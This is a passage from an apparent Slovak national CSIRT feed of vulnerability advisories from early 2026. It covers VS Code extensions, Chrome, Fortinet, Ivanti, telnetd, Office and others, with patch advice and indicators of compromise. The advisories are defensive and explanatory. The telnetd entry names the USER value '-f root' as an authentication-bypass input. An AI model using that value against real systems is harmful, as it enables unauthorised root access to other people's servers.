Visual Studio Code Live Server verzia 5.7.9 a staršie
Visual Studio Code Code Runner verzia 0.12.2 a staršie
Visual Studio Code Markdown Preview Enhanced verzia 0.8.18 a staršie
Visual Studio Code Live Preview vo verziách starších ako 0.4.16

Opis zraniteľnosti:

CVE-2025-65715 (CVSS 3.1 skóre: 7.8)

Zraniteľnosť s označením CVE-2025-65715 sa nachádza v rozšírení Code Runner pre Visual Studio Code. Súvisí s absenciou validácie používateľsky definovaných premenných v konfiguračnom súbore settings.json, konkrétne hodnoty code-runner.executorMap, ktorú rozšírenie bez kontroly preberá do Node.js child_process.spawn() so zapnutým shell: true. Ak útočník dokáže presvedčiť vývojára, aby otvoril škodlivý workspace alebo vložil upravené nastavenie do súboru settings.json, môže pri spustení vyvíjaného kódu dôjsť k vykonaniu ľubovoľného príkazu shell v kontexte používateľa (napr. vytvoreniu reverzného shellu).

CVE-2025-65716 (CVSS 3.1 skóre: 8.8)

Vysoko závažná zraniteľnosť CVE-2025-65716 sa nachádza v rozšírení Markdown Preview Enhanced pre Visual Studio Code. Súvisí s neošetreným vykresľovaním náhľadu HTML tagov v súboroch .md. Útočník dokáže pri náhľade upraveného dokumentu typu Markdown pomocou iframe vykonať ľubovoľný kód JavaScript v súlade s politikou same-origin. Výskumníci z Ox Security týmto spôsobom dokázali enumerovať porty na zariadení obete a exfiltrovať získané dáta.

CVE-2025-65717 (CVSS 3.1 skóre: 9.1)

Kritická zraniteľnosť CVE-2025-65717 sa nachádza v rozšírení Live Server pre Visual Studio Code a súvisí s absentujúcou ochranou CORS. Pri spustenom lokálnom HTTP serveri umožňuje vzdialenému útočníkovi bez autentifikácie exfiltrovať súbory z vývojárskeho počítača. Stačí, aby obeť otvorila odkaz na škodlivú webstránku útočníka, ktorá následne zneužije prístup k portu localhost:5500 na prehliadanie a odosielanie citlivých dát na server pod kontrolou útočníka.

Okrem vyššie popísaných zraniteľností našli výskumníci spoločnosti Ox Security zraniteľnosť v rozšírení Microsoft Live Preview, ktorá nedostala číslo CVE. Jedná sa o chybu zabezpečenia, ktorá súvisí s možnosťou neužiť neošetrený parameter relativePathFormatted, čo útočníkovi umožňuje vykonávať útoky typu XSS a bez autentifikácie enumerovať a pristupovať k súborom obete. Útočník môže získať tajomstvá, prístupové kľúče a iné citlivé informácie zo zariadenia obete.

Možné škody:

Vzdialené vykonanie kódu
Únik citlivých údajov
Získanie úplnej kontroly nad systémom

Odporúčania:

Organizáciám odporúčame aktualizovať všetky rozšírenia pre Visual Studio Code na opravené verzie a povoliť iba pre projekt nevyhnutné doplnky z dôveryhodných zdrojov.

Zdroje:

Kyberbezpečnostná hra: Fakt alebo Mýtus

Marian Danko — Thu, 19 Feb 2026 14:13:25 +0000

Pripravili sme si pre Vás interaktívnu kyberbezpečnostnú hru „Fakt alebo Mýtus“, ktorá zábavnou formou preverí Vaše znalosti a zároveň Vám priblíži reálne kybernetické hrozby a spôsoby ochrany pred nimi.

Prostredníctvom 30 krátkych otázok sa dozviete, ako fungujú útoky, aké chyby útočníci najčastejšie zneužívajú a ako Vám môže Vládna jednotka CSIRT pomôcť zvýšiť úroveň Vašej kybernetickej bezpečnosti.

Otestujte sa a zistite, ako ste pripravení čeliť vybraným kybernetickým hrozbám: https://csirt.sk/kyberbezpecnostna-hra.html

Aktívne zneužívaná zraniteľnosť v Google Chrome umožňuje vzdialene vykonávať kód

Marian Danko — Mon, 16 Feb 2026 14:46:14 +0000

Vývojári spoločnosti Google opravili vysoko závažnú aktívne zneužívanú zraniteľnosť v prehliadači Chrome, ktorá umožňuje vzdialené vykonanie kódu.

Zraniteľné systémy:

Chrome pre Windows/macOS verzie staršie ako 145.0.7632.75/76
Chrome pre Linux verzie staršie ako 144.0.7559.75

Opis činnosti:

CVE-2026-2441 (CVSS 3.1 skóre 8,8)

Spoločnosť Google opravila vysoko závažnú zraniteľnosť v prehliadači Google Chrome, ktorá umožňuje vzdialenému útočníkovi spustiť ľubovoľný kód v sandboxe prostredníctvom špeciálne vytvorenej HTML stránky. Zraniteľnosť sa nachádza v komponente CSS a súvisí s možnosťou použitia dealokovanej pamäte. Pre jej zneužitie potrebuje útočník presvedčiť obeť, aby navštívila špeciálne vytvorenú webstránku.

Zraniteľnosť je aktívne zneužívaná. Objavil ju bezpečnostný výskumník Shaheen Fazim.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Používateľom odporúčame bezodkladne aktualizovať prehliadač Google Chrome na verziu 145.0.7632.75/76 (Windows, macOS), resp. 144.0.7559.75 (Linux) alebo novšiu.

Zdroj:

Mesačný prehľad kritických zraniteľností január 2026

Marian Danko — Mon, 16 Feb 2026 09:05:35 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2026.

Mesačný prehľad – 01/2026 PDF (632 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kritická zraniteľnosť BeyondTrust Remote Support a Privileged Remote Access umožňuje vykonávať príkazy

Marian Danko — Mon, 16 Feb 2026 08:52:03 +0000

Vývojári BeyondTrust Remote Support a Privileged Remote Access opravili kritickú zraniteľnosť, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi vykonávať systémové príkazy na zraniteľnom systéme.

Zraniteľné systémy:

BeyondTrust Remote Support (RS) 25.3.1 a staršie
BeyondTrust Privileged Remote Access (PRA) 24.3.4 a staršie

Opis činnosti:

CVE-2026-1731 (CVSS skóre 9,9)

Spoločnosť BeyondTrust opravila kritickú zraniteľnosť v produktoch Remote Support a Privileged Remote Access. CVE-2026-1731 umožňuje neautentifikovanému útočníkovi odoslať špeciálne upravené klientske požiadavky pre vzdialené vykonanie systémových príkazov na cieľovom systéme v kontexte „site user“. Úspešné zneužitie zraniteľnosti môže viesť ku kompromitácii zraniteľného systému, krádeži dát a zneprístupneniu služby.

Možné škody:

Vzdialené vykonávanie kódu
Únik citlivých údajov
Zneprístupnenie služby (DoS)

Odporúčania:

Administrátorom lokálnych inštancií odporúčame bezodkladnú aktualizáciu aspoň na verzie RS 25.3.2 a PRA 25.1.1, resp. inštaláciu záplat Patch BT26-02-RS (v21.3 – 25.3.1) a Patch BT26-02-PRA (v22.1 – 24.X).

Pokiaľ používate verziu RS staršiu ako 21.3 a/alebo verziu PRA staršiu ako 22.1, potrebujete pre ošetrenie zraniteľnosti prejsť na podporovanú verziu.

Cloudové inštancie spoločnosť aktualizovala automaticky a používatelia nepotrebujú vykonať žiadne opatrenia.

Odkazy:

Kritická zraniteľnosť modulu WPvivid Backup & Migration pre WordPress umožňuje vykonávať kód

Marian Danko — Mon, 16 Feb 2026 08:42:33 +0000

Vývojári modulu WPvivid Backup & Migration pre WordPress opravili kritickú zraniteľnosť, ktorá umožňuje útočníkom zneužiť proces výmeny šifrovacích kľúčov na podvrhnutie ľubovoľného škodlivého súboru a jeho nahratie do ľubovoľného verejne dostupného adresáru.

Zraniteľné systémy:

WPvivid Backup & Migration verzie 0.9.123 a staršie

Opis činnosti:

CVE-2026-1357 (CVSS skóre 9,8)

Bezpečnostní výskumníci upozorňujú na kritickú zraniteľnosť v doplnku WPvivid Backup & Migration pre WordPress. Zraniteľnosť s označením CVE-2026-1357 umožňuje neautentifikovanému útočníkovi nahrať ľubovoľné súbory a vzdialene vykonať kód na zasiahnutých webových stránkach.

Chyba zabezpečenia vyplýva z nevhodného postupu aplikácie po chybnom dešifrovaní šifrovacieho kľúča relácie vo funkcii openssl_private_decrypt(), kde nedochádza k ukončeniu procesu. Vygenerovanú chybovú hodnotu (boolean false) preberie mechanizmus pre šifrovanie AES ako reťazec/kľúč nulových bajtov. To umožňuje útočníkovi a podvrhnúť ľubovoľný súbor šifrovaný kľúčom z nulových bajtov. Modul tiež po dešifrovaní obsahu neošetruje používateľom dodané názvy súborov, čo umožňuje útočníkovi zneužiť parameter wpvivid_action=send_to_site a prechádzať verejne dostupnými adresármi mimo ošetrené úložisko, kam môže uložiť ľubovoľný súbor.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia modulu WPvivid Backup & Migration aspoň na verziu 0.9.124.

Odkazy:

Apple opravila aktívne zneužívanú zero-day zraniteľnosť svojich operačných systémov

Marian Danko — Thu, 12 Feb 2026 14:34:19 +0000

Spoločnosť Apple vydala bezpečnostné aktualizácie svojich operačných systémov iOS, iPadOS, macOS, tvOS, watchOS a visionOS, ktoré opravujú viacero zraniteľností, z čoho jedna je označená ako aktívne zneužívaná zero-day.

Zraniteľné systémy:

Zariadenia s operačným systémom watchOS starším ako 26.3
Zariadenia s operačným systémom tvOS starším ako 26.3
Zariadenia s operačným systémom macOS Tahoe starším ako 26.3
Zariadenia s operačným systémom visionOS starším ako 26.3
Zariadenia s operačným systémom iOS starším ako 26.3
Zariadenia s operačným systémom iPadOS starším ako 26.3

Opis zraniteľnosti:

CVE-2026-20700

Aktívne zneužívaná zero-day zraniteľnosť s označením CVE-2026-20700 sa nachádza v komponente Dynamic Link Editor (dyld) a vedie ku poškodeniu pamäte. Útočník schopný zapisovať do pamäte by ju mohol zneužiť na vykonanie ľubovoľného kódu.

Predmetná zraniteľnosť bola spoločne s CVE-2025-14174 a CVE-2025-43529 v decembri 2025 zneužitá v rámci sofistikovaných útokov na používateľov iOS.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Spoločnosť Apple odporúča bezodkladnú aktualizáciu operačných systémov aspoň na verzie

iOS 26.3
iPadOS 26.3
macOS Tahoe 26.3
tvOS 26.3
watchOS 26.3
visionOS 26.3

Zdroje:

Zraniteľnosť Windows Notepad umožňuje vzdialené vykonanie kódu prostredníctvom dokumentov Markdown

Marian Danko — Thu, 12 Feb 2026 14:22:11 +0000

Spoločnosť Microsoft v rámci Patch Tuesday vo februári 2026 opravila vysoko závažnú bezpečnostnú zraniteľnosť v textovom editore Windows Notepad. CVE-2026-20841 umožňuje vzdialené vykonanie kódu prostredníctvom dokumentu Markdown.

Zraniteľné systémy:

Windows Notepad

Opis zraniteľnosti:

CVE-2026-20841 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť aplikácie Notepad s označením CVE-2026-20841 spočíva v nesprávnej neutralizácii špeciálnych prvkov. Vzdialený neautorizovaný útočník by ju mohol zneužiť podvrhnutím špeciálne vytvorených súborov typu Markdown na vzdialené vykonanie kódu v kontexte obete.

Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí kliknúť na URL odkaz v dokumente typu Markdown, otvorenom v aplikácii Notepad.

Na uvedenú zraniteľnosť je dostupný tzv. návod Proof-of-Concept demonštrujúci princíp jej zneužitia.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu aplikácie Windows Notepad.

Zdroje:

Kritická zraniteľnosť FortiClientEMS 7.4.4

Marian Danko — Wed, 11 Feb 2026 14:29:00 +0000

Fortinet FortiClientEMS verzie 7.4.4 obsahuje zraniteľnosť, ktorá umožňuje vykonávať SQL injekciu prostredníctvom nesanitizovaných HTTP požiadaviek. Vzdialený neautorizovaný útočník môže získať schopnosť vykonávať kód a príkazy.

Zraniteľné systémy:

FortiClientEMS 7.4.4

Opis činnosti:

CVE-2026-21643 (CVSS skóre 9,8)

Vývojári spoločnosti Fortinet opravili kritickú zraniteľnosť FortiClientEMS, ktorá súvisí s nedostatočnou sanitizáciou používateľských dát, resp. absentujúcou neutralizáciou špeciálnych znakov. Zraniteľnosť umožňuje injektovať do HTTP požiadaviek príkazy SQL. Vzdialený neautorizovaný útočník tak môže vykonávať pomocou SQL injekcie príkazy a kód.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia FortiClientEMS aspoň na verziu 7.4.5

Odkazy:

Microsoft vo februárovom balíku aktualizácií Patch Tuesday opravil 2 kritické a šesť aktívne zneužívaných zraniteľností

Marian Danko — Wed, 11 Feb 2026 14:26:48 +0000

Spoločnosť Microsoft vydala vo februári 2026 balík opráv pre portfólio svojich produktov opravujúci 54 zraniteľností, z ktorých 2 spoločnosť označila ako kritické. Tieto umožňujú získať citlivé informácie a eskalovať oprávnenia. Šesť opravených zraniteľností je aktívne zneužívaných a umožňujú eskalovať oprávnenia útočníka, obchádzať bezpečnostné prvky a zneprístupniť službu.

Zraniteľné systémy:

.NET 10.0 installed on Linux
.NET 10.0 installed on Mac OS
.NET 10.0 installed on Windows
.NET 8.0 installed on Linux
.NET 8.0 installed on Mac OS
.NET 8.0 installed on Windows
.NET 9.0 installed on Linux
.NET 9.0 installed on Mac OS
.NET 9.0 installed on Windows
Azure AI Language Authoring
Azure DevOps Server 2022
Azure HDInsight
Azure IoT Explorer
Azure Local
GitHub Copilot Plugin for JetBrains IDEs
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft ACI Confidential Containers
Microsoft Defender for Endpoint for Linux
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Exchange Server 2016 Cumulative Update 23
Microsoft Exchange Server 2019 Cumulative Update 14
Microsoft Exchange Server 2019 Cumulative Update 15
Microsoft Exchange Server Subscription Edition RTM
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft Outlook 2016 (32-bit edition)
Microsoft Outlook 2016 (64-bit edition)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2022 version 17.14
Microsoft Visual Studio 2022 version 18.3
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
Office Online Server
Power BI Report Server
Visual Studio Code
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 25H2 for ARM64-based Systems
Windows 11 Version 25H2 for x64-based Systems
Windows 11 Version 26H1 for ARM64-based Systems
Windows 11 version 26H1 for x64-based Systems
Windows App for Mac
Windows Notepad
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis činnosti:

V rámci februárového balíka Patch Tuesday opravila spoločnosť Microsoft vo svojich produktoch 54 zraniteľností. Z nich 2 zaradila spoločnosť Microsoft do kategórie kritické a 51 bolo vyhodnotených ako vysoko závažné („Important“). Šesť zraniteľností je aktívne zneužívaných. Kritické zraniteľnosti umožňujú získať citlivé informácie a eskalovať oprávnenia.

CVE-2025-21510 (CVSS skóre 8,8)

Aktívne zneužívaná vysoko závažná zraniteľnosť sa nachádza v bezpečnostnom mechanizme Windows Shell. Vzdialený neautorizovaný útočník by ju mohol zneužiť podvrhnutím špeciálne vytvorených URL odkazov alebo súborov na obídenie Windows SmartScreen a bezpečnostných výziev. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí otvoriť špeciálne vytvorený súbor alebo URL odkaz.

CVE-2026-21513 (CVSS skóre 8,8)

Aktívne zneužívaná zraniteľnosť bezpečnostného mechanizmu MSHTML Framework. Vzdialený neautorizovaný útočník ju môže zneužiť na jeho obídenie a prípadne môže získať schopnosť vykonávať kód. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí otvoriť špeciálne vytvorený súbor alebo URL odkaz.

CVE-2025-21514 (CVSS skóre 7,8)

Aktívne zneužívaná zraniteľnosť v Microsoft Word spočíva v závislosti bezpečnostných rozhodovaní na nedôveryhodných vstupoch. Neautorizovaný útočník ju môže lokálne zneužiť podvrhnutím špeciálne vytvorených súborov Office na obídenie bezpečnostných mechanizmov na ochranu pred zraniteľnými komponentami COM/OLE. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí škodlivý súbor otvoriť.

CVE-2025-21519 (CVSS skóre 7,8)

Aktívne zneužívaná zraniteľnosť v komponente Desktop Window Manager môže lokálny útočník s nízkymi oprávneniami zneužiť na eskaláciu oprávnení na úroveň SYSTEM. Zraniteľnosť súvisí so zámenou typu premennej.

CVE-2025-21525 (CVSS skóre 6,2)

Aktívne zneužívaná zraniteľnosť vo Windows Remote Access Connection Manager spočíva v dereferencii nulového ukazovateľa. Lokálny neautorizovaný útočník by ju mohol zneužiť na zneprístupnenie služby.

CVE-2025-21533 (CVSS skóre 7,8)

Aktívne zneužívaná zraniteľnosť vo Windows Remote Desktop by lokálny autorizovaný útočník mohol zneužiť na pridanie nových používateľských kont do skupiny Administrator. Útočník môže eskalovať svoje privilégiá až na úroveň SYSTEM.

Zraniteľnosti CVE-2026-21522 a CVE-2026-23655 v Azure Compute Gallery, ktoré spoločnosť označila ako kritické, možno zneužiť na eskaláciu privilégií, neoprávnený prístup k citlivým údajom, vrátane tokenov a kľúčov.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu
Eskalácia oprávnení
Nedostupnosť služby (DoS)
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo stránky výrobcu. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac február a Mode „Update Tuesday“. Bližšie informácie nájdete aj tu.

Odkazy:

Kritické zero-day zraniteľnosti v produkte Ivanti Endpoint Manager Mobile

Marian Danko — Thu, 05 Feb 2026 14:23:24 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre Ivanti Endpoint Manager Mobile, ktoré opravujú dve aktívne zneužívané kritické zero-day zraniteľnosti. CVE-2026-1281 a CVE-2026-1340 umožňujú injekciu kódu. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Ivanti Endpoint Manager Mobile 12.5.0.0 a staršie
Ivanti Endpoint Manager Mobile 12.6.0.0 a staršie
Ivanti Endpoint Manager Mobile 12.7.0.0 a staršie
Ivanti Endpoint Manager Mobile 12.5.1.0 a staršie
Ivanti Endpoint Manager Mobile 12.6.1.0 a staršie

Opis zraniteľnosti:

CVE-2026-1281, CVE-2026-1340 (CVSS 3.1 skóre 9.8)

Kritické zraniteľnosti s identifikátormi CVE-2026-1281 a CVE-2026-1340 súvisia s nedostatočným zabezpečením premenných, čo umožňuje plniť ich používateľským vstupom. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na vykonanie kódu zaslaním špeciálne vytvorených požiadaviek HTTP GET.

Zraniteľnosti sú aktívne zneužívané.

Možné škody:

Vzdialené vykonanie kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Spoločnosť Ivanti odporúča bezodkladnú aplikáciu záplat RPM_12.x.0.x alebo RPM_12.x.1.x na zraniteľné systémy, podľa používanej verzie. Tieto však treba opätovne aplikovať po každej ďalšej aktualizácii.

Permanentná oprava bude implementovaná v pripravovanej verzii 12.8.0.0.

Odporúča aj kontrolu dostupných logov na prítomnosť pokusov o zneužitie zraniteľnosti podľa návodu na svojej stránke. V prípade podozrenia na kompromitáciu zariadení sa odporúča rollback na overenú zálohu alebo úplná reinštalácia systému, zmena prihlasovacích údajov a kryptografického materiálu.

Zdroje:

Fortinet opravil aktívne zneužívanú kritickú zraniteľnosť vo FortiCloud SSO

Marian Danko — Thu, 29 Jan 2026 13:28:21 +0000

Spoločnosť Fortinet vydala bezpečnostné aktualizácie FortiOS, FortiManager, FortiProxy a FortiAnalyzer, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť vo FortiCloud SSO. CVE-2026-24858 by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie autentifikácie na zraniteľné zariadenia.

Zraniteľné systémy:

FortiAnalyzer 7.6.0 až 7.6.5
FortiAnalyzer 7.4.0 až 7.4.9
FortiAnalyzer 7.2.0 až 7.2.11
FortiAnalyzer 7.0.0 až 7.0.15
FortiManager 7.6.0 až 7.6.5
FortiManager 7.4.0 až 7.4.9
FortiManager 7.2.0 až 7.2.11
FortiManager 7.0.0 až 7.0.15
FortiOS 7.6.0 až 7.6.5
FortiOS 7.4.0 až 7.4.10
FortiOS 7.2.0 až 7.2.12
FortiOS 7.0.0 až 7.0.18
FortiProxy 7.6.0 až 7.6.4
FortiProxy 7.4.0 až 7.4.12
FortiProxy 7.2.0 až 7.2.15
FortiProxy 7.0.0 až 7.0.22
FortiWeb 8.0.0 až 8.0.3
FortiWeb 7.6.0 až 7.6.6
FortiWeb 7.4.0 až 7.4.11

Opis zraniteľností:

CVE-2026-24858 (CVSS 3.0 skóre 9,8)

Aktívne zneužívanú kritickú zraniteľnosť FortiOS, FortiManager, FortiAnalyzer, FortiProxy, FortiWeb s identifikátorom CVE-2026-24858 by vzdialený neautentifikovaný útočník mohol zneužiť na získanie prístupu do zariadení registrovaných na cudzie účty, ktoré majú povolenú autentifikáciu FortiCloud SSO. Na to potrebuje účet na službe FortiCloud a registrované zariadenie od spoločnosti Fortinet.

Prihlasovanie pomocou FortiCloud SSO nie je štandardne predkonfigurované, no aktivuje sa po zaregistrovaní zariadenia do služby FortiCare cez grafické rozhranie.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu firmvéru zraniteľných zariadení aspoň na verziu:

FortiAnalyzer 7.6.6, 7.4.10, 7.2.12 alebo 7.0.16
FortiManager 7.6.6, 7.4.10, 7.2.12 alebo 7.0.16
FortiOS 7.6.6, 7.4.11, 7.2.13 alebo 7.0.19
FortiProxy 7.6.6, 7.4.13, 7.2.16 alebo 7.0.23
FortiWeb 8.0.4, 7.6.7 alebo 7.4.12

V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno pre FortiManager a FortiAnalyzer mitigovať deaktiváciou prihlasovania prostredníctvom FortiCloud SSO a limitovaním prístupu k manažmentovému rozhraniu zariadenia len na zoznam dôveryhodných IP adries. Služba FortiCloud SSO nepodporuje pokusy o prihlásenie zo zraniteľných klientov, preto pre ne netreba vykonať žiadnu aktivitu.

Odporúčame tiež skontrolovať logy na prítomnosť IOC a pokusy o zneužitie zraniteľnosti. V prípade ich detekcie možno zariadenie považovať za kompromitované.

IOC:

E-mail
cloud-init[at]mail[.]io
cloud-noc[at]mail[.]io
IP address
104.28.244[.]115
104.28.212[.]114
104.28.195[.]105
104.28.195[.]106
104.28.212[.]115
104.28.227[.]106
104.28.227[.]105
104.28.244[.]114
37.1.209[.]19
217.119.139[.]50
Account name
audit
backup
itadmin
secadmin
support
backupadmin
deploy
remoteadmin
security
svcadmin
system

Zdroje:

Zraniteľnosť vm2 pre Node.js umožňuje obísť sandboxing

Marian Danko — Wed, 28 Jan 2026 12:14:06 +0000

Vývojári knižnice vm2 pre Node.js s funkcionalitou sandboxingu opravili kritickú chybu, ktorá útočníkom umožňuje uniknúť zo sandboxu a vykonávať ľubovoľný kód.

Zraniteľné systémy:

Node.js vm2 verzia 3.10.0 a staršie

Opis činnosti:

CVE-2026-22709 (CVSS skóre 9,8)

Kritická zraniteľnosť knižnice Node.js vm2 pre sandboxing nedôveryhodného obsahu umožňuje obchádzať sanitizáciu volaní Promise.prototype.then a Promise.prototype.catch. Lokálne volania funkcií sú ošetrené, avšak globálne nie. Útočníci tak môžu obísť hlavnú funkciu knižnice, uniknúť zo sandboxu a vykonávať ľubovoľný kód.

Možné škody:

Obídenie bezpečnostných prvkov
Vykonávanie ľubovoľného kódu

Odporúčania:

Bezodkladná aktualizácia Node.js vm2 aspoň na verziu 3.10.2.

Odkazy:

Microsoft opravil aktívne zneužívanú zero-day zraniteľnosť v balíku Office

Marian Danko — Wed, 28 Jan 2026 12:08:27 +0000

[Aktualizované 4.2.2026] Spoločnosť Microsoft vydala mimoriadne bezpečnostné aktualizácie kancelárskeho balíka Microsoft Office, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. CVE-2026-21509 možno zneužiť podvrhnutím špeciálne vytvorených súborov na obídenie bezpečnostných mechanizmov pre ochranu pred zneužitím niektorých funkcií COM/OLE a získanie úplnej kontroly nad systémom. Zraniteľnosť zneužíva skupina APT28 v rámci rozsiahlej kampane.

Zraniteľné systémy:

Microsoft Office 2016
Microsoft Office 2019
Microsoft Office LTSC 2021
Microsoft Office LTSC 2024
Microsoft 365 Apps for Enterprise

Opis zraniteľnosti:

CVE-2026-21509 (CVSSv3 skóre 7,8)

Vysoko závažná zero-day zraniteľnosť s identifikátorom CVE-2026-21509 spočíva v nedostatočnej implementácii bezpečnostných mechanizmov pre ochranu pred zneužitím zraniteľných funkcií COM/OLE. Neautorizovaný útočník by ju mohol zneužiť lokálne na obídenie bezpečnostných mechanizmov. Potrebuje na to zaslať obeti špeciálne vytvorený súbor MS Office a presvedčiť ju, aby ho otvorila.

Americká CISA pridala zraniteľnosť na svoj zoznam aktívne zneužívaných zraniteľností KEV (Known Exploited Vulnerabilities).

Zraniteľnosť zneužíva ruská štátom sponzorovaná skupina APT28 v rámci rozsiahlej kampane šíriacej malvér prostredníctvom špeciálne vytvorených dokumentov MS Word. Po ich otvorení sa vytvorí pripojenie cez protokol WebDAV k útočníckej infraštruktúre a stiahnu sa ďalšie komponenty. Tie zahŕňajú škodlivú verziu DLL knižnice EhStoreShell.dll a PNG obrázok SplashScreen.png obsahujúci shellcode. Cieľom je nainštalovať malvér MiniDoor (kradne e-maily) a PixyNetLoader, ktorý nainštaluje útočný nástroj Covenant. Súvisiace útoky boli zaznamenané aj na Slovensku.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia zraniteľných verzií MS Office 2016 aspoň na verziu 16.0.5539.1001 a MS Office 2019 aspoň na verziu 16.0.10417.20095.

Zraniteľnosť je možné mitigovať aj podľa odporúčaní výrobcu spočívajúcich v úprave registrov Windows.

Odporúčame preveriť vo Vašich systémoch prítomnosť indikátorov kompromitácie zhrnutých tu.

Zdroje:

Telnetd obsahuje kritickú zraniteľnosť

Marian Danko — Tue, 27 Jan 2026 16:06:00 +0000

Nástroj telnetd v balíku GNU InetUtils nesanitizuje používateľské vstupy v niektorých premenných. Tým umožňuje injektovať hodnoty vedúce k obídeniu autentifikácie a získanie prístupu s oprávneniami používateľa root. V nástroji sa nachádza vyše 10 rokov.

Zraniteľné systémy:

GNU InetUtils verzie 1.9.3 až 2.7

Opis činnosti:

CVE-2026-24061 (CVSS skóre 9,8)

Nástroj telnetd v balíku GNU Inetutils obsahuje kritickú zraniteľnosť, ktorá umožňuje obídenie autentifikácie na diaľku. Zraniteľnosť súvisí s nedostatočnou kontrolou používateľských vstupov na serveri telnetd v rámci premennej prostredia USER. Ak útočník poskytne jej hodnotu ako “-f root“, získa prístup na zraniteľný server s administrátorskými oprávneniami.

Spoločnosť Greynoise zaznamenala pokusy o zneužitie tejto zraniteľnosti.

Možné škody:

Obídenie bezpečnostných prvkov
Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia zraniteľných systémov, napríklad tu a tu. V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno mitigovať deaktiváciou servera telnetd alebo použitím vlastnej upravenej funkcie login(1), ktorá nepovoľuje použitie príznaku -f.

Odporúčame limitovanie prístupu cez telnet len z dôveryhodných IP adries a kontrolu dostupných logov na prítomnosť pokusov o zneužitie zraniteľnosti.

Odkazy:

Cisco opravila kritickú zero-day zraniteľnosť vo viacerých produktoch

Marian Danko — Tue, 27 Jan 2026 15:56:58 +0000

Spoločnosť Cisco opravila kritickú aktívne zneužívanú zraniteľnosť CVE-2026-20045 vo viacerých svojich produktoch. Zraniteľnosť umožňuje neautentifikovanému útočníkovi vzdialene vykonávať systémové príkazy a získať oprávnenia používateľa root.

Zraniteľné systémy:

Unified CM (CSCwr21851)
Unified CM SME (CSCwr21851)
Unified CM IM&P (CSCwr29216)
Unity Connection (CSCwr29208)
Webex Calling Dedicated Instance (CSCwr21851)

Opis činnosti:

CVE-2026-20045 (CVSS skóre 9,8)

Spoločnosť Cisco vydala bezpečnostné aktualizácie pre viacero produktov, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť, spočívajúcu v nesprávnom overovaní používateľských vstupov v rámci HTTP požiadaviek. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie príkazov operačného systému zariadenia, získanie neoprávneného prístupu do jeho systému a eskaláciu privilégií na úroveň používateľa root. Na to potrebuje poslať špeciálne vytvorenú HTTP požiadavku na webové manažmentové rozhranie zraniteľného zariadenia.

Americká CISA zraniteľnosť pridala do svojho zoznamu aktívne zneužívaných zraniteľností KEV (Known Exploited Vulnerabilities).

Možné škody:

Vzdialené vykonávanie kódu
Eskalácia privilégií

Odporúčania:

